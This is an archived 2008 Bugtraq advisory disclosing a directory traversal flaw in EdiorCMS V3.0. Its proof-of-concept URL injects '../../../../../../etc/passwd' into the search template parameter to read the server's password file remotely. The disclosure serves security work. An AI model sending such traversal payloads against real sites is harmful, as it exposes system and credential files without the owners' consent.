Directory traversal in EdiorCMS V3.0

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Directory traversal in EdiorCMS V3.0
From: wsn1983@xxxxxxxxx
Date: 13 Mar 2008 05:48:56 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Directory traversal in EdiorCMS V3.0 

Application:  EdiorCMS V3.0
Vendor:       http://www.edior.com      
Versions:     3.0
Platforms:    ALL
Bug:          Directory traversal
Exploitation: remote
Date:         13 Mar 2008
Author:       Shennan Wang
              e-mail: wsn1983@xxxxxxxxx
POC:          
http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd

Prev by Date: XSS in PHP-Nuke (eWeather module)
Next by Date: Re: Re: VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
Previous by thread: XSS in PHP-Nuke (eWeather module)
Next by thread: Rise of the spammers
Index(es):
- Date
- Thread